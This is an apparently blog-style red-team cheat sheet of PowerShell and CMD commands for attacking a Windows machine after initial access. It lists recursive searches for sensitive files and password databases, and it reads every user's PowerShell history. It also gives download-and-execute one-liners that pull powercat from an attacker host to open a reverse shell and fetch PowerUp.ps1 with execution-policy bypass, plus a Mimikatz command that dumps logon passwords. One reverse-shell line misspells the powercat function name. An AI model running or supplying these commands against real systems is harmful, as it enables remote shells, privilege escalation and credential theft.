Windows Machine Enumeration for Red Team
Find Juicy Files
1
2
3
4
5
6
7
8
# Unfiltered
Get-ChildItem -Path . -File -Recurse -ErrorAction SilentlyContinue | ForEach-Object { $_.FullName }
# Filterer Extension
Get-ChildItem -Path . -Include *.txt -File -Recurse -ErrorAction SilentlyContinue | ForEach-Object { $_.FullName }
# Filterer Multiple Extensions
Get-ChildItem -Path . -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.kdbx,*.ini,*.yaml,*.yml,*.xml,*.sql -File -Recurse -ErrorAction SilentlyContinue | ForEach-Object { $_.FullName }
Reverse Shell
Invoke-Expression with PowerCat
Download Powercat v2.0.
1
2
3
4
5
# PowerShell
IEX(New-Object System.Net.WebClient).DownloadString('http://<ATTACKER_IP>/powercat.ps1');powerrcatt -c <ATTACKER_IP> -p 5555 -e cmd
# CMD
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<ATTACKER_IP>/powercat.ps1');powerrcatt -c <ATTACKER_IP> -p 5555 -e cmd"
PowerShell History
1
2
3
Get-History
(Get-PSReadlineOption).HistorySavePath
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Enumerate All Users via Administrator
1
Get-WmiObject Win32_UserProfile | Where-Object { -not $_.Special -and $_.LocalPath } | ForEach-Object { $file = Join-Path -Path $_.LocalPath -ChildPath "AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"; if (Test-Path $file) { "`n=== History for user: $($_.LocalPath) ===`n"; Get-Content $file } }
Script Block Logging.
1
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" | Where-Object { $_.Id -eq 4104 } | Format-List -Property * | Out-File "scriptblocklogs.txt"
Privilege Escalation (Auto)
Download PowerUp.ps1.
1
powershell -ep bypass -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<ATTACKER_IP>/PowerUp.ps1'); Invoke-AllChecks"
Credential Dump
Download Mimikatz.
1
.\mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords" "exit"
This post is licensed under CC BY 4.0 by the author.